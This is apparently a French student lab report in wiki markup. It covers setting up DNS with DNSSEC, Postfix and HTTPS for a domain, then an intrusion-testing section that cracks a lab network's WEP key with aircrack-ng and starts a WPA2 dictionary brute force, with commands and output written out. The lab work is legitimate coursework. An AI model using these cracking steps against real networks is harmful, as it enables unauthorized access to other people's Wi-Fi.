 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
